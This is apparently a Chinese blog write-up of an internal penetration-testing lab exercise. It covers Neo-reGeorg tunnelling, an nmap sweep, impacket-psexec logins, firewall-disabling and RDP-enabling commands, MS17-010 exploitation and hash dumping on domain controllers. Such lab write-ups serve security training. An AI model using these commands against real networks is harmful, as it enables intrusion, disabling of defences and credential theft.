Contents

内网横向考核

前言

一个月前入职了qax,结果一直没活干,天天带薪学习(

做了一下实验室给的内网靶场,提升一下实战水平。

信息收集

跳板机:10.95.208.101

内网网段:172.16.0.0/16

登录跳板机

首先这步需要登录公司的VPN,然后通过ssh连接跳板机。跳板机可以出网,但是不能把代理挂在公网上(公司规定),所以不用frp做反向代理转而用Neo-reGeorg做正向代理。

1
python neoreg.py generate -k password

生成服务端脚本

https://s1.ax1x.com/2022/08/07/vKmd56.png

但是有个很操蛋的问题,跳板机上是没有web服务的,所以得先自己下个tomcat搭个web环境,然后将tunnel.jsp放到tomcat的相应目录下。

搭建完成后就可以在攻击机上连接上脚本

1
python neoreg.py -k password -u http://10.95.208.101:8080/tunnel.jsp

https://s1.ax1x.com/2022/08/07/vKmD2D.png

这里完成后,一开始我是选择Neo-reGeorg+proxifier的搭配的,但是后来证明不如Neo-reGeorg+proxychains好用,简直浪费大把时间。

接下来就是利用nmap做存活主机探测

1
nmap -A -v 172.16.0.0/16

探测结果如下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
* 172.16.9.10
  * OS                 Windows Server 2016 Standard 6.3
  * name               DC
  * domain             adexch.local
  
* 172.16.9.20
  * name               exchadmin
  * domain             adexch.local
  * service			   exchange

* 172.16.10.10
  * OS                 windows server 2008 HPC Edition 6.1
  * name               DC
  * domain             redteamlabs.local

* 172.16.11.10
  * OS                 windows  server 2012 r2 datacenter 6.3
  * name               DC
  * domain             redteamlabs.local

* 172.16.11.20
  * OS                 windows server 2008

* 172.16.12.10
  * OS                 windows server 2016 datacenter 6.3
  * name               DC
  * domain             redteamlabs.local

* 172.16.13.10
  * OS                 windows server 2012 r2 datacenter
  * name               DC
  * domain             redteamlabs.local

* 172.16.14.10
  * OS                 windows server 2012 r2 datacenter 6.3
  * name               DC
  * domain             redteamlabs.local

* 172.16.15.10
  * OS                 windows server 2016 standard 6.3
  * name               DC
  * domain             ades.local

* 172.16.15.20
  * OS                 windows server 2016 standard 6.3
  * name               ca
  * domain             ades.local
  * service            IIS Windows Server

* 172.16.15.25
  * OS                 linux
  * 22                 ssh

* 172.16.16.15
  * 22                 ssh
  * 8080               http-proxy

目标还是挺多的,先从linux下手,因为之前的跳板机是给了账号密码的,并且172.16.16.15的靶机开了ssh服务,先尝试一波

https://s1.ax1x.com/2022/08/07/vKmB8O.png

拿下一台主机,在这台做了下信息收集,没啥有价值的东西。接下来瞄准172.16.9.20,因为上面搭了exchange服务,前几天刚做了exchange的渗透总结。

在用nmap扫描主机的时候,已经发现了用户名为exchadmin,并且存在域adexch.local,所以同样用之前的密码试一下,可以成功登录

https://s1.ax1x.com/2022/08/07/vKmrxe.png

但是上面一封邮件都没有(这里已删除邮件是我自己尝试的时候删除),访问/ecp可以发现有三个邮件用户administrator、exchadmin、exchange,另外两个用户用相同密码登陆时失败。

这个时候就想用proxyshell, proxylogon打一下试一下,这里有个巨坑的点浪费了我好几天时间,就是它不能导出邮件,不管是直接在网页端还是脚本发出导出请求都会失败。所以在我尝试了msf和GitHub上的exp之后都不能拿到shell,只能执行exchange shell的命令。这条路子遂放弃。

一开始我想,既然已知域,账号还有密码,为什么不用psexec连接。所以在打exchange之前我用msf试了一下,但是失败了遂放弃。但后来我把代理改成proxychains并且挂在kali上,并用impacket-psexec连接,连接成功

1
proxychains4 impacket-psexec domain/username:password@ip

https://s1.ax1x.com/2022/08/07/vKm6rd.png

横向渗透

先在当前主机上做信息收集

查看域管理员有哪些账号

1
net group "domain admins" /domain

https://s1.ax1x.com/2022/08/07/vKmyKH.png

发现当前登录的用户就是域管理员,所以直接用当前账号登录域控172.16.9.10

https://s1.ax1x.com/2022/08/07/vKm2VI.png

之后关闭防火墙,开启3389端口

1
2
3
4
// 关闭防火墙
netsh advfirewall set allprofiles state off
// 开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

https://s1.ax1x.com/2022/08/07/vKmcqA.png

尝试用xfreerdp远程连接

https://s1.ax1x.com/2022/08/07/vKmWIP.png

另外一台有web服务的主机是172.16.15.20 ,但是上面的IIS是默认界面,没有什么攻击点。

而其他的主机除了windows域服务默认的端口也没有开放有价值的端口,所以这个时候我也只能想到用MS17-010之类的漏洞尝试一波

https://s1.ax1x.com/2022/08/07/vKmRat.png

打成功了,但是还有个问题:这里执行有限的命令,不能直接shell。不过好在可以使用kiwi模块里的hashdump

https://s1.ax1x.com/2022/08/07/vKm5RS.png

这个时候既然能拿到hash了,那么明文密码也无所谓了

https://s1.ax1x.com/2022/08/07/vKmhPf.png

之后还是一样,关闭防火墙,开启3389端口。剩下的主机也都是一样的套路,因为都可以用MS17-010打成功,不成功的也可以抓取到hash。

总结

这次靶场还是比较简单的,主要还是增加了内网渗透的熟练度吧。最大的坑点还是在exchange那块,耽误了好几天时间,看脚本代码->修改脚本代码->打poc,结果最后是不能导出邮件。。。